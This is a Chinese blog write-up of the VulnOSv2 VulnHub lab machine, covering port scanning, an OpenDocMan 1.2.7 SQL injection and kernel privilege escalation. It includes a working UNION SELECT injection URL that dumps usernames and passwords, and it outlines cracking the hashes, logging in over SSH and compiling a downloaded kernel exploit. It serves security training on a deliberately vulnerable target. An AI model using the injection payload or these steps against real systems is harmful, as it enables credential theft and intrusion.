Vulnhub系列:VulnOSv2

最新推荐文章于 2024-08-13 08:37:17 发布
最新推荐文章于 2024-08-13 08:37:17 发布
阅读量460 收藏
点赞数 2
分类专栏: 渗透项目 文章标签: web安全 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938645/article/details/129339521
版权

老样子,kali ip:192.168.56.104,靶机ip利用nmap或arp-scan -l进行查看

靶机ip为:192.168.56.124,利用nmap进行端口探测

发现了22、80、6667端口,下一步就是进行web探测,输入靶机ip后发现页面存在个链接,其他没什么发现

点击链接后跳转到一个新的界面,看了半天也没什么信息,查看源码后发现,在Documentation处,隐藏着一些好东西!

你看看,真是有点gou!,同时发现了个目录名

输入后发现了一个登录窗口,框架为opendocman 1.2.7

本地搜索一下,还真发现了个exp,下面的操作就是以前都有的,将exp复制到项目文件夹下

查看一下,该怎么利用,这边是一个sql注入的漏洞,利用给的实例

发现了是联合查询注入,在2的地方存在注入点

那就直接手注,构造payload,查看用户名和密码

http://192.168.56.124/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,username,3,4,5,6,7,8,9%20from%20odm_user

返现了两个密码,进行md5解密后得到了两个密码,将其写入一个文件备用

尝试ssh登录,发现webmin登录成功

利用python改变一个交互式shell,代码就不写了,以前的都有

然后就是提权了,利用sudo,发现不行,那就尝试linux内核提权,收集到信息为

Linux 3.13.0 ubuntu 14.04.4

本地查找后发现了个醒目的红色,将其复制到项目文件夹中

开启kali的web服务,在shell中进入/tmp文件夹下,下载该exp,然后利用gcc进行编译,并给编译后的exp授权,最后允许该exp,内核提权成功!

获取到了flag

本次Vulnhub的VulnOSv2靶机渗透就结束了,后续会继续更新Vulnhub更多的靶机!

每天学习一丢丢,进步一丢丢~

Ays.Ie
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnosv2 靶机训练
weixin_43999483的博客
03-02 229
参考博客传送门 关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击 searchsploit OpenDocMan 1.2.7 一般存放目录都放在 /usr/share/exploitdb下面 获得低权限用户后 可以考虑Linux内核提权 searchsploit Linux 3.13.0 搭建一个文件服务器 python -m SimpleHTTPServer 6666 下载 wget http://xxx.xxx.xxx.xxx 如果是c类型文件,需要gcc编译 找
Vulnhub-靶机-VulnOSv2
qq_43264813的博客
03-01 468
Vulnhub—靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.1
渗透测试靶机----VulnOsv2
久恙502的博客
01-29 421
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
vulnhub靶场vulnosv2靶场
zzzzzzkeai的博客
12-08 202
vulnhub靶场--vulnosv2靶场
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
YouthBelief的博客
12-05 2293
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结 0x00 环境搭建 VritualBox配置网络为 host-only VMware中kali加入 host-only 为Virtual Box的网卡 开启虚拟机报错 usb 2.0 什么的问题 修改usb设备为1.0 0x01 信息
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
vulnhub VulnOS: 2
箭雨镜屋
12-05 2564
本文思路:nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)
vulnhub-VULNOS: 2渗透测试靶场
shulao2010的博客
05-29 152
分析如何利用SQL注入漏洞最后拿到root权限
No.14-VulnHub-VulnOS: 2-Walkthrough渗透学习
qq_34801745的博客
01-11 1147
** VulnHub-VulnOS: 2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/ 靶机难度:中级(CTF) 靶机发布日期:2016年5月17日 靶机描述:VulnOS是打包为虚拟映像的一系列易受攻击的操作系统,以增强渗透测试技能 这是版本2- 体积更小,更少混乱! 由于时间并不总是在我身边,因此花了很长时间创建...
Vulnhub靶机 pwnos v2.0
菜浪马废的博客
04-25 525
先看一下80 ports=$(nmap -p- --min-rate=1000 -sT -T4 10.10.10.100 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports -sT 10.10.10.100 爆破网站目录 找漏洞 发现以上内容 找漏洞 运行脚本 创...
Vulnhub:DeRPnStiNK渗透测试
mandarava的博客
03-08 1010
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
渗透测试攻防练习实验室 (资源分享,国外在线教程)
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
Linux系统提权思路
热门推荐
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的提权exp放出来,如果有的话,直接编译运行提权即可,简单粗暴。       如果没有相关内核的提权exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种提权思路,第一种就是内核e
应急响应计划:网络安全事件后的快速恢复策略
最新发布
A526847的博客
08-13 294
对事件处理过程进行总结和分析,评估应急响应计划的执行效果,提出改进措施和建议,为未来的应急响应工作提供参考。
网络安全知识渗透测试
m0_66268916的博客
08-09 551
渗透测试是一种模拟网络攻击,用于识别漏洞并制定规避防御措施的策略。笔测试还有助于评估组织的合规性、提高员工对安全协议的认识、评估事件响应计划的有效性并确保业务连续性。渗透测试的第一步是收集有关目标网络的信息,了解网络拓扑、主机信息、服务信息、用户账户等,以便制定针对性的攻击策略。成功攻破目标系统后,需要进行后渗透测试,巩固攻击成果,并获取更多信息。根据信息收集和漏洞扫描的结果,选择合适的攻击方法,对目标网络进行渗透测试。完成渗透测试后,需要对测试结果进行分析,评估内网的整体安全状况。
vulnhub靶机系列
09-09
2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值